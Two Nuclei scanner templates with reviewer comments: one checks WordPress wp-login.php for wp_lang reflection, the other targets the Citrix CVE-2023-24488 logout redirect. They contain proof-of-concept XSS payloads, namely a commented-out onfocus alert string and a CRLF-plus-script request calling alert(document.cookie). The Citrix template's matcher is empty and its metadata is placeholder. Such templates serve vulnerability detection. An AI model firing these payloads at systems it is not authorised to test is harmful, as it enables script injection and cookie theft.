├── wplang-xss.yaml
└── CVE-2023-24488.yaml
/wplang-xss.yaml:
--------------------------------------------------------------------------------
# Nuclei template: probes wp-login.php for reflection of the wp_lang parameter
# (WPML < 4.6.1 per the description below) by sending an encoded quote (%27).
id: wplang-xss

#payload = wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0C

info:
  name: wp-xss
  # NOTE(review): author is empty and reference holds the tag "xss" rather than
  # an advisory or changelog URL — fill both in before publishing.
  author:
  severity: high
  description: WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
  reference:
    - xss
  remediation: update plugin to latest version
  tags: xss

requests:
  - method: GET
    path:
      # en_US followed by %27 (a single quote) — the probe is a quote, not a script payload.
      - '{{BaseURL}}/wp-login.php?wp_lang=en_US%27'

    # Both matchers must hold: HTTP 200 and the marker string in the body.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          # NOTE(review): &#039; is the HTML-entity form of the injected quote;
          # confirm that this string marks unsafe reflection on a known-vulnerable
          # install and is absent on a patched one, otherwise the check may report
          # correctly-encoded output as a finding.
          - '#039;"='

--------------------------------------------------------------------------------
/CVE-2023-24488.yaml:
--------------------------------------------------------------------------------
# Nuclei template for CVE-2023-24488 (Citrix; see the reference link).
# Sends a post_logout_redirect_uri containing CRLF sequences and a script tag
# and expects a 302 response.
id: CVE-2023-24488

info:
  name: CVE-2023-24488
  author: assetnote
  severity: medium
  # NOTE(review): description and tags are still placeholder values
  # ("description", "tags"); replace them with the advisory summary and real tags.
  description: description
  reference:
    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
  tags: tags

requests:
  - raw:
      # |+ keeps the trailing newlines, which is what terminates the HTTP header
      # block in the raw request.
      - |+
        GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Cookie: NSC_TASS=/Citrix
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
        Sec-Gpc: 1
        Accept-Language: en-GB,en
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Connection: close


    # NOTE(review): the Sec-Ch-Ua / Sec-Fetch-* / User-Agent headers above look
    # like browser-capture noise; the check presumably does not depend on them —
    # confirm and trim so the template is easier to audit.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        # NOTE(review): this word matcher has an empty words list, so it can never
        # match; with matchers-condition: and the template can never report a
        # finding (and the template may be rejected at load time). Either supply
        # the response string that confirms unsafe reflection or remove this
        # matcher — a bare 302 on its own is not evidence of the vulnerability.
        words:
          -
      - type: status
        status:
          - 302
--------------------------------------------------------------------------------